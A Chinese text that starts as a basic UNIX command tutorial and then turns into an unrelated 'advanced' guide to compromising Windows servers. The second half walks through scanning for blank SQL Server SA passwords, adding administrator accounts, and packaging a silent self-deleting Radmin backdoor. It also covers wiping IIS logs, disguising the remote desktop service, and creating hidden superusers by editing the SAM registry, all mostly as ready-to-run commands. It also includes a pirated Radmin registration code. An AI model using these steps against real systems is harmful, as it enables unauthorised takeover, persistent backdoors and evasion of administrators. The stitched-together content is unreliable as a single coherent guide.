UNIX 常用的指令/终结完整编

UNIX 常用的指令
1. ls

这是最基本的档案指令。 ls 的意义为 "list"，也就是将某一个目录或是

某一个档案的内容显示出来。如果你在下 ls 指令後头没有跟著任何的档名，它将会显示出目前目录中所有档案。也可以在 ls 後面加上所要察看的目录名称或档案的名称，如

% ls /etc

ls 有一些特别的参数，可以给予使用者更多有关的资讯，如下:

-a : 在 UNIX 中若一个目录或档案名字的第一个字元为 "." , 则使用 ls

将不会显示出这个档案的名字，我们称此类档案为隐藏档。如 tcsh的初设档 .tcshrc；如果我们要察看这类档案，则必须加上参数 -a 。

-l : 这个参数代表使用 ls 的长( long )格式，可以显示更多的资讯，如档案存取权，档案拥有者( owner )，档案大小，档案最後更新日期，甚而 symbolic link 的档案是 link 那一个档等等。如下

% ls -l

　

2. cp

cp 这个指令的意义是复制("COPY") , 也就是将一个或多个档案复制成另一个档案或者是将其复制到另一个目录去。

-i : 此参数是当已有档名为 f2 的档案时，若迳自使用 cp 将会将原来 f2

的内容掩盖过去，因此在要盖过之前必须先询问使用者一下。如使用者

的回答是y(yes)才执行复制的动作。

-r : 此参数是用来做递回复制用，可将一整颗子树都复制到另一个

目录中。

　

3. mv

mv 的意义为 move , 主要是将一档案改名或换至另一个目录。如同 cp ，它也有

三种格式:

　

mv 的参数有两个，-f 和 -i , 其中 -i 的意义与 cp 中的相同，均是 interactive

询问之意。而 -f 为强迫( force ) , 就是不管有没有同名的档案，反正我就是要

搬过去，所有其他的参数遇到 -f 均会失效。

　

4. rm

rm 的意义是 remove ，也就是用来杀掉一个档案的指令。在 UNIX 中一

个被杀掉的档案除非是系统恰好有做备份，否则是无法像 DOS 里面一样还能够救回

来的。所以在做 rm 动作的时候使用者应该要特别小心。

　

-f : 将会使得系统在删除时，不提出任何警告讯息。

-i : 在除去档案之前均会询问是否真要除去。

-r : 递回式的删除。

　

5. mkdir

mkdir 是一个让使用者建立一个目录的指令。你可以在一个目录底下使用

midir 建立一个子目录，使用的方法就不用多说了吧！

　

6. chdir ( cd )

这是让使用者用来转移工作目录用的。

chdir dirname

如此你就可以将目前的目录转移到 dirname 这一个目录去。或使用 "chdir .." 来转移到上一层目录。

　

7. rmdir

相对於 mkdir ，rmdir 是用来将一个"空的"目录杀掉的。如果一个目录下面没有任何档案，你就可以用 rmdir 指令将其除去。rmdir 的使用法如下:

rmdir dirname1 [ dirname2 .... ]

如果一个目录底下有其他的档案， rmdir 将无法将这个目录杀掉，除非使用 rm 指令的 -r 选项。

　

8. pwd

pwd 会将目前目录的路径( path )显示出来，例如:

9. cat/more/less

以上三个指令均为察看档案内容的指令。cat 的意义是猫....不不不，是 concatenate ，在字典上的意思是"连结,将…串成锁状"( 语出资工电子词典 cdict )，其实就是把档案的内容显示出来的意思。 cat 有许多奇怪的参数，较常为人所使用的是 -n 参数，也就是把显示出来的内容加上行号。 cat 的用法如下:

cat [-n] :自标准输入读进内容，你可以用 pipe 将别的程式的输出转向

给 cat .

cat [-n] filename : 将 filename 的内容读进来，显示在标准输出上。问题在於 cat 它是不会停下来的，因此并不好用( 试想如果一个萤幕二十四行，而一个档案四百行，cat 一出来将会劈哩啪啦不断的卷上去，使用者很难据此得到他们所需的资讯。) 所以才有人又写了 more 出来。

more ,可以将所观察的档案跟据终端机的形态一页页的显示出来，再根据使用者的要求换页或卷行。如果使用者要在某一个档案中搜寻一个特定的字串，则按 / 然後跟著打所要搜寻的单字即可进行搜寻。more 也可以找得到。more 的使用法如下:

more filename

　

如果你在使用中觉得已经看到了所要看的部份，可以按'q'离开 more 的使用。在使用中按'v' 亦可以使用编辑器来编辑所观看的档案。less 的用法与 more 极类似，原先它就是为了弥补 more 只能往前方卷页的缺点而设计。 less 的用法如下:

less filename

其与 more 不同的是它可以按 y 来往上卷一行，并且可以用"?"来往回搜寻你所要找的单字。

　

10. chmod

chmod 为变更档案模式用( change mode ) . 这个指令是用来更改档案的存取模式( access mode )。在 UNIX 一个档案上有可读(r)可写(w)可执行(x)三种模式,分别针对该档案的拥有者( onwer )、同群者( group member )( 你可以 ls -lg 来观看某一档案的所属的 group )，以及其他人( other )。一个档案如果改成可执行模式则系统就将其视为一个可执行档，而一个目录的可执行模式代表使用者有进入该目录之权利。chmod 就是用来变更一些档案的模式，其使用方式如下:

chmod [ -fR ] mode filename ...

其参数的意义如下:

-f Force. chmod 不会理会失败的动作。

-R Recurive. 会将所有子树下的所有子目录及档案改为你所要改成的模式。

mode 可以为一个三位或四位的八进位数字，来表示对某些对象的存取权。详情可参阅 chmod(1) 的 manual page 中有关 Absolute Modes 的说明。或是用一个字串来表示，请参考 chmod(1) 的说明。

b. 关於 Process 处理的指令:

1. ps

ps 是用来显示目前你的 process 或系统 processes 的状况。

以下列出比较常用的参数:

　

其选项说明如下:

-a 列出包括其他 users 的 process 状况。

-u 显示 user - oriented 的 process 状况 。

-x 显示包括没有 terminal 控制的 process 状况 。

-w 使用较宽的显示模式来显示 process 状况 。

　

我们可以经由 ps 取得目前 processes 的状况，如 pid , running state 等。

2. kill

kill 指令的用途是送一个 signal 给某一个 process 。因为大部份送的都是

用来杀掉 process 的 SIGKILL 或 SIGHUP ，因此称为 kill 。kill 的用法

为:

　

kill [ -SIGNAL ] pid ...

kill -l

　

SIGNAL 为一个 singal 的数字，从 0 到 31 ，其中 9 是 SIGKILL ，也就是一

般用来杀掉一些无法正常 terminate 的讯号。其馀讯号的用途可参考 sigvec(2)

中对 signal 的说明。

　

你也可以用 kill -l 来察看可代替 signal 号码的数目字。kill 的详细情形

请参阅 man kill。

c. 关於字串处理的指令:

1. echo

echo 是用来显示一字串在终端机上。□ echo -n 则是当显示完之後不会有跳行的动作。

　

2. grep/fgrep

grep 为一过滤器，它可自一个或多个档案中过滤出具有某个字串的行，或是

自标准输入过滤出具有某个字串的行。

　

fgrep 可将欲过滤的一群字串放在某一个档案中，然後使用 fgrep 将包含有

属於这一群字串的行过滤出来。

　

grep 与 fgrep 的用法如下:

　

grep [-nv] match_pattern file1 file2 ....

fgrep [-nv] -f pattern_file file1 file2 ....

　

-n 把所找到的行在行前加上行号列出

-v 把不包含 match_pattern 的行列出

match_pattern 所要搜寻的字串

-f 以 pattern_file 存放所要搜寻的字串

d. 网路上查询状况的指令:

1. man

man 是手册 ( manual ) 的意思。 UNIX 提供线上辅助( on-line help )的功能，

man 就是用来让使用者在使用时查询指令、系统呼叫、标准程式库函式、各种表

格等的使用所用的。man 的用法如下:

　

man [-M path] [section] title ] .....

man [-M path] -k keyword ...

　

-M path man 所需要的 manual database 的路径。

我们也可以用设定环境变数 MANPATH 的方式来取代 -M 选项。

title 这是所要查询的目的物。

section 为一个数字表示 manual 的分类，通常 1 代表可执行指令，

2 代表系统呼叫( system call ) ，3 代表标准函数，等等。

我们如要参考 eqnchar(7) 的资料，则我们就输入 man 7 eqnchar ，

便能取得我们所要的辅助讯息。

-k keyword

用来将含有这项 keyword 的 title 列出来。

man 在 UNIX 上是一项非常重要的指令，我们在本讲义中所述之用法均仅只是一个大家比较常用的用法以及简单的说明，真正详细的用法与说明还是要请你使用 man 来得到。

　

2. who

who 指令是用来查询目前有那些人在线上。

　

3. w

　

w 指令是用来查询目前有那些人在线上，同时显示出那些人目前的工作。

　

4. ku

ku 可以用来搜寻整个网路上的 user ，不像 w 跟 who 只是针对 local host 的查询. 而且 ku 提供让使用者建立搜寻特定使用者名单的功能。你可以建立一个档案 information-file 以条列的方式存放你的朋友的资料，再建立一个档案 hosts-file 来指定搜寻的机器名称。 ku 的指令格式可由 ku -h 得到。

E. 网路指令:

UNIX 提供网路的连接，使得你可以在各个不同的机器上做一些特殊的事情，如你可以在系上的 iris 图形工作站上做图形的处理，在系上的 Sun 上读 News ，甚至到学校的计中去找别系的同学 talk 。这些工作可以利用 UNIX 的网路指令，在你的位子上连到各个不同的机器上工作。如此一来，即使你在寝室，也能轻易的连至系上或计中来工作，不用像以前的人必须泡在冷冰冰的机房面。

这些网路的指令如下所述:

1. rlogin 与 rsh

rlogin 的意义是 remote login , 也就是经由网路到另外一部机器 login 。

rlogin 的格式是:

　

rlogin host [ -l username ]

　

选项 -l username 是当你在远方的机器上的 username 和 local host 不同的时後，必须输入的选项，否则 rlogin 将会假设你在那边的 username 与 localhost 相同，然後在第一次 login 时必然会发生错误。

rsh 是在远方的机器上执行某些指令，而把结果传回 local host 。rsh 的格式

如下:

　

rsh host [ -l username ] [ command ]

　

如同 rlogin 的参数 -l username , rsh 的 -l username 也是指定 remote host的 username 。而 command 则是要在 remote host 上执行的指令。如果没有 指定 command ，则 rsh 会去执行 rlogin ，如同直接执行 rlogin 。

不过 rsh 在执行的时候并不会像一般的 login 程序一样还会问你 password , 而是如果你没有设定 trust table , 则 remote host 将不会接受你的 request 。

　

rsh 须要在每个可能会做为 remote host 的机器上设定一个档案，称为 .rhosts。这个档案每一行分为两个部份，第一个是允许 login 的 hostname , 第二个部份则是允许 login 的username 。例如，在 ccsun7.csie.nctu.edu.tw 上头你的 username 为 QiangGe , 而你的 home 下面的 .rhost 有以下的一行:

ccsun6.cc.nctu.edu.tw u8217529

则在 ccsun6.cc.nctu.edu.tw 机器上的 user u8217529 就可以用以下的方法来执行 rsh 程式:

% rsh ccsun7.csie.nctu.edu.tw -l ysjuang cat mbox

　

将 ysjuang 在 ccsun7.csie.nctu.edu.tw 上的 mbox 档案内容显示在 local host ccsun6.cc.nctu.edu.tw 上。

　

而如果 .rhost 有这样的一行，则 ccsun6.cc.nctu.edu.tw 上的 user u8217529

将可以不用输入 password 而直接经由 rsh 或 rlogin login 到

ccsun7.csie.nctu.edu.tw 来。

　

注意:

　

.rhost 是一个设定可以信任的人 login 的表格，因此如果设定不当将会让不法之徒有可以乘机侵入系统的机会。 如果你阅读 man 5 rhosts ，将会发现你可以在第一栏用 + 来取代任何 hostname ，第二栏用 + 来取代任何username 。

　

如一般 user 喜欢偷懒利用 " + username " 来代替列一长串 hostname ，但是这样将会使得即使有一台 PC 上跑 UNIX 的 user 有与你相同的 username , 也可以得到你的 trust 而侵入你的系统。这样容易造成系统安全上的危险。因此本系禁止使用这样子的方式写你的 .rhost 档，如果

发现将予以停机直到你找中心的工作人员将其改正为止。 同理，如果你的第二个栏位为 + ，如" hostname + " ,则你是允许在某一部机器上的"所有"user 可以不用经由输入 password 来进入你的帐号，是壹种更危险的行为。所以请自行小心。

　

2. telnet

telnet 是一个提供 user 经由网路连到 remote host。

telnet 的 格式如下:

　

telnet [ hostname ip-address ] [ port ]

　

hostname 为一个像 ccsun1 或是 ccsun1.cc.nctu.edu.tw 的 name address，ip-address 则为一个由四个小於 255 的数字组成的 ip address ，如 ccsun1的 ip-address 为140.113.17.173 ， ccsun1.cc.nctu.edu.tw 的 ip-address为 140.113.4.11 。你可以利用 telnet ccsun1 或 telnet 140.113.17.173 来连到 ccsun1。

　

port 为一些特殊的程式所提供给外界的沟通点，如资工系的 MUD 其 server 便提供一些 port 让 user 由这些 port 进入 MUD 程式。详情请参阅 telnet(1)的说明。

3. ftp

ftp 的意义是 File Transfer Program ，是一个很常应用在网路档案传输的

程式。ftp 的格式如下:

ftp [ hostname ip-address ]

其中 hostname ip-address 的意义跟 telnet 中的相同。

　

在进入 ftp 之後，如果与 remote host 连接上了，它将会询问你 username 与密码，如果输入对了就可以开始进行档案传输。

在 ftp 中有许多的命令，详细的使用方式请参考 ftp(1) ，这里仅列出较常用的 cd , lcd , mkdir , put , mput , get , mget , binary , ascii , prompt , help 与 quit 的使用方式。

ascii 将传输模式设为 ascii 模式。通常用於传送文字档。

binary 将传输模式设为 binary 模式，通常用於传送执行档，压缩档与影像档等。

cd remote-directory 将 remote host 上的工作目录改变。

lcd [ directory ] 更改 local host 的工作目录。

ls [ remote-directory ] [ local-file ] 列出 remote host 上的档案。

get remote-file [ local-file ] 取得远方的档案。

mget remote-files 可使用通用字元一次取得多个档案。

put local-file [ remote-file] 将 local host 的档案送到 remote host。

　

mput local-files 可使用通用字元一次将多个档案放到 remote host 上。

help [ command ] 线上辅助指令。

mkdir directory-name 在 remote host 造一个目录。

prompt 更改交谈模式，若为 on 则在 mput 与 mget 时每作一个档案之传输时均会询问。

quit/bye 离开ftp .

利用 ftp ，我们便可以在不同的机器上将所需要的资料做转移，某些特别的机器更存放大量的资料以供各地的使用者抓取，本校较著名的 ftp server 有 NCTUCCCA 与系上的ftp.csie.nctu.edu.tw 。这些 ftp server 均有提供一个 user 称为 anonymous ，一般的"外来客"可以利用这个 username 取得该 server 的公共资料。不过 anonymous 在询问 password 时是要求使用anonymous 的使用者输入其 email address，以往有许多台湾的使用者在使用国外的 ftp server 时并没有按照人家的要求输入其 email address，而仅是随便打一些字串，引起许多 internet user 和管理者的不满，对台湾的使用者的风评变得很差，因此遵循各 ftp server 的使用规则也是一件相当重要的事。

f. 关於通讯用的指令:

1. write

这个指令是提供使用者传送讯息给另一个使用者，使用方式:

write username [tty]

　

2. talk/ytalk/cytalk/ctalk

UNIX 专用的交谈程式。会将萤幕分隔开为你的区域和交谈对象的区域，同时也可和不同机器的使用者交谈。使用方式:

talk username[@host] [tty]

　

3. mesg

选择是否接受他人的 messege , 若为 messege no 则他人的 messege 将无法传送给你，同时他也无法干扰你的工作。使用方法:

mesg [-n-y]

4. mail/elm

在网路上的 email 程式，可经由此程式将信件 mail 给他人。 使用方式:

　

mail [username]

mail -f mailboxfile

　

如有信件，则直接键入 mail 可以读取你的 mail .

　

elm 提供较 mail 更为方便的介面，而且可做线上的 alias . 你可以进入 elm

使用上下左右键来选读取的信件，并可按 h 取得线上的 help 文件。

　

使用方式:

　

elm [usernmae]

elm -f mailboxfile

　

g. 编译器( Compiler ):

Compiler 的用处在於将你所撰写的程式翻译成一个可执行档案。在资工系常用的程式语言是 C , pascal , FORTRAN 等。你可以先写好一个 C 或 Pascal 或 FORTRAN 的原始程式档，再用这些 compiler 将其翻成可执行档。你可以用这个方法来制造你自己的特殊指令。

1. cc/gcc (C Compiler)

/usr/bin/cc

/usr/local/bin/gcc

　

语法: cc [ -o execfile ] source

gcc [ -o execfile ] source

execfile 是你所希望的执行档的名称，如果没有加上 -o 选项编译出来的可执行档会以 a.out 做为档名。 source 为一个以 .c 做为结尾的 C 程式档。请参阅 cc(1) 的说明。

　

2. pc (Pascal Compiler)

/usr/local/bin/pc

语法: pc [ -o execfile ] source

execfile 是你所希望的执行档的名称，如果没有加上 -o 选项编译出来的可执行档会以 a.out 做为档名。 source 为一个以 .p 做为结尾的 Pascal 程式档。 请参阅 /net/home5/lang/man 中 pc(1) 的说明。

3. f77 (Fortran Compiler)

/net/home5/lang/f77

　

语法: f77 [ -o execfile ] source

　

execfile 是你所希望的执行档的名称，如果没有加上 -o 选项编译出来的可执行档会以 a.out 做为档名。 source 为一个以 .p 做为结尾的 FORTRAN 程式档。

　

h. 有关列印的指令:

以下为印表所会用到的指令，在本系的印表机有 lp1 , lp2 ( 点矩阵印表机 )，

lw , sp , ps , compaq ( 雷射印表机 )，供使用者使用。

1. lpr

lpr 为用来将一个档案印至列表机的指令。

　

用法:

lpr -P[ printer ] file1 file2 file3 ....

　

或

lpr -P[ printer ] < file1

　

例子:

lpr -Plp1 h*llo.c h*llo.lst h*llo.map

lpr -Plp1 < h*llo.c

　

前者以参数输入所要印出的档案内容，後者列印标准输入档案(standard input)的内容，因已将 h*llo.c 转向到标准输入，故会印出 h*llo.c 的档案内容。

　

2. lpq

lpq 是用来观察 printer queue 上的 Jobs 。

用法:

lpq -P[ printer ]

3. lprm

lprm 是用来取消列印要求的指令。 通常我们有时会印错，或是误送非文字档资料至 printer , 此时就必须利用 lprm 取消列印 request ，以免造成资源的浪费。

　

用法:

lprm -P[ printer ] [ Jobs id username ]

　

lprm 用来清除 printer queue 中的 Jobs , 如果你使用 Job Id 作为参数，则它将此 Job 自printer queue 清除，如果你用 username作为参数，则它将此 queue中所有 Owner 为此username 的 Jobs 清除。

　

i. 更改个人使用资料:

1. passwd

passwd 是用来更改你的使用密码，用法为:

passwd [ username ]

在使用 passwd 的时候，它会先问你的旧密码，然後询问两次要更改的密码，确定无误後才将你的密码改掉。

2. chsh

chsh 是提供使用者更换 login sh*ll 的指令，你可经由此更换自己使用的 sh*ll 。

终结完整编(提高篇)

工具:WINNTAutoAttack自动攻击器(扫漏洞)

SQLTOOLS(SA空口令连接器)

RAMDIN影子3.0中文版(远程控制程序)

RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序)

CleanIISLog.exe(小榕的擦PP程序)

3389.exe(开3389端口服务的)

psu.exe(使用被禁止的Guest帐户要用到的)

mstsc.exe(远程桌面连接程序)


一.扫到SA弱口令..(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet 开telnet服务

net user skx skx /add 添加用户skx密码为skx
net localgroup administrators skx /add 将帐号skx升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe
2、在本地设置服务端（一定要生成）

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg

4、编写一个批处理，并命名为u.bat

--------------------------------------------

@echo off

net stop r_server

--------------------------------------------

5、写第二个批处理，r.bat,内容为

--------------------------------------------

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@net start r_server

@del rad.exe

@del 1.reg

@del r.bat

@del u.bat

--------------------------------------------

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包

7、将Rad.rar制作成自解压文件.

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%\\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成

四.用RADMIN客服端连接....

上传文件到c:\\WINNT(XP是windows):

port.bat(如果是在XP下..这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反弹后门

RADMIN进入TELNET

运行 c:\\winnt\\3389.exe

重启肉鸡

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题..

使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

telnet对方ip。发现需要NTLM 身份验证。

我们在自己的电脑里建立一个帐号skx密码为skx身份为管理员。

找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。

修改cmd的快捷方式属性为允许其他身份登陆。

然后运行桌面上的cmd.exe的快捷方式。输入帐号skx密码skx
telnet对方ip.直接可以登陆对方电脑了。

使用命令

c:\\query user (查看对方目前终端登陆状况。)

运行命令

c:\\logoff 1(踢出去一个管理者)

再用c:\\query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:\\winnt\\log . 自己的IP .(擦PP)

c:\\winnet\\1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->> Microsoft SQL Server-->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

复制一下代码:SELMIS

--------------------------------------------

if exists (select * from

dbo.sysobjects where id = object_id(N\'[dbo].[xp_cmdshell]\') and

OBJECTPROPERTY(id, N\'IsExtendedProc\') = 1)


exec sp_dropextendedproc N\'[dbo].[xp_cmdshell]\'


GO

--------------------------------------------

按F5(运行)

关了退出SQL Server再用SQL Server身位验证进一次.退出(这是为了不留下记录)

八.改3389端口和服务名称

修改服务器端的端口设置 ，注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]

PortNumber值，默认是3389，选择10进制 修改成所希望的端口，比如1314

第二个地方：

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　

PortNumber值，默认是3389，选择10进制 修改成所希望的端口，比如1314

要重启系统才能用新端口连.(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]

的键值为mm.reg文件.

编辑mm.reg文件.替换TermService为Alerter(错误警告服务..别的服务也行)

再把第十行的"Description"="(这里是服务说明..改为你所换的服务说明..这里改为通知所选用户和计算机有关系统管理级警报。)"

第十一行的"DisplayName"="(这里是服务名称..改为你所换的服务名称..这里改为Alerter)

保存..再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)

再在CMD下

CD c:\\winnt\\system32

copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)

CD C:\\winnt

sc \\\\127.0.0.1 config Alerter binpath= c:\\winnt\\system32\\service.exe(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)..用Radmin重启肉鸡..


十.使用被禁用的帐户[Guest]登陆.删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users

用法：[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值

如:psu –p regedit –i 157

将Guest克成管理员权限

克成管理员权限的方法:

找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的类型值.

在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相应的类型值的数据) 然后删除Guest的配置

2.查看计算机管理中帐户列表 刷新这时候会出现错误[找不到帐户](跳过这步也行)

3.将Guest的配置(二个REG文件导进注册表)

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]

net user Guest **** [修改密码]

net user Guest /active:yes

net user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用.

6.用Guest登陆后删除自己建的帐号

net user skx /del

整个过程结束

最后最好把RADMIN的服务也改了..多留个后门多条路..呵呵

整个过程全部结束..这机子就真正变成你的肉鸡了...

文章里面的内容都是以下动画的内容(通过我自己的理解写的..也许存在许多错误..希望对和偶一样的菜鸟有帮助)

笑语☆嫣然的《终结3389》

mervin制作 <《终结3389》补充版>

孤狼望月 <使用被禁用的帐户[Guest]登陆>

(他还有个(隐藏帐号后门教程)也差不多)

碎片 <Radmin服务端最新配置方法>

最后送一个找固定IP肉鸡的方法:

菜菜鸟教程之－如何提高扫描到肉鸡的机会 BY：网络凡人

先找个有不正常端口的代理，代理我一般到网迷之家(www.52cyq.com)拿的。就这个好了

218.58.88.15:45576 [山东省 青岛市](我的是教育网，扫描不到国外的机的，所以用国内的IP来

做试范），我把它扩充了整一个网段。由218.58.88.1－218.58.88.255你可以扩充成218.58.80.1－

218.58.90.255 .端口为了减少动画的大小，就扫描3389好了，。IP扩充多少就要看你

的网快还是慢。快的就扩充多点，慢的只扫描一个c段IP好了。看到没有，[218.58.88.8]:

发现 NT-Server弱口令: Administrator/[空口令]就是这么简单就可以扫描到肉鸡的，记得，

我这里出不了国外，才扫描国内的机。你们扫描国外的机，不要扫描国内的机啊～

如果发生了什么事，公安会找你的哦。好了。扫描就说到这了。
、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户

net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口

点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。

打开键：HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names\\hacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键"F"的值复制，并覆盖hacker$对应的项00000409下的键"F"的值,然后再将 00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除：net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\\SAM\\SAM键权限改回原来的样子（只要删除添加的帐户administrator即可）。

9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。


如何在命令行下远程建立隐藏的超级用户

在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有 schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动 schedule服务就行。

对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。

1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。（例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。）
2、先与肉鸡建立连接,命令为: net use \\\\13.50.97.238\\ipc$ "12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动):at \\\\13.50.97.238 12:51

c:\\winnt\\system32\\net.exe user hacker$ 1234 /add

建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINE\\sam\\sam\\Domains\\account\\users下键值：at \\\\13.50.97.238 12:55

c:\\winnt\\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\account\\users\\

/e 是regedit.exe的参数，在_LOCAL_MACHINE\\SAM\\SAM\\Domains\\account\\users\\这个键的一定要以\\结尾。必要的情况下可以用引号将"c:\\winnt\\ regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\account\ \users\\"引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：copy \\\\13.50.97.238\\admin$\\system32\\hacker.reg

c:\\hacker.reg

修改的方法图形界中已经介绍过了，这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上 copy c:\\hacker.reg \\\\13.50.97.238\\admin$\\system32\\hacker1.reg

7、查看肉鸡时间：net time \\\\13.50.97.238 然后用at命令将用户hacker$删除:

at \\\\13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除:用

net use \\\\13.50.97.238 /del 断开与肉鸡的连接。

net use \\\\13.50.97.238\\ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接，不能连接说明已删除。

9、再与肉鸡建立连接：net use \\\\13.50.97.238\\ipc$ "12345678" /user:"administrator"

再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

at \\\\13.50.97.238 13:41 c:\\winnt\\regedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办？

这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。

但是这里有两个前提：1、先用net use \\\\肉鸡ip\\ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后，才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务（没有开启的话，你也可以远程开启，因为你有超级用户的密码了）。

四、利用被禁用的帐户建立隐藏的超级用户：

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:

1．想办法查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红*；而在命令行下，我还没有想到好的办法，只能在命令行下用命令："net user 用户名" 一个一个来查看用户是否被禁用。

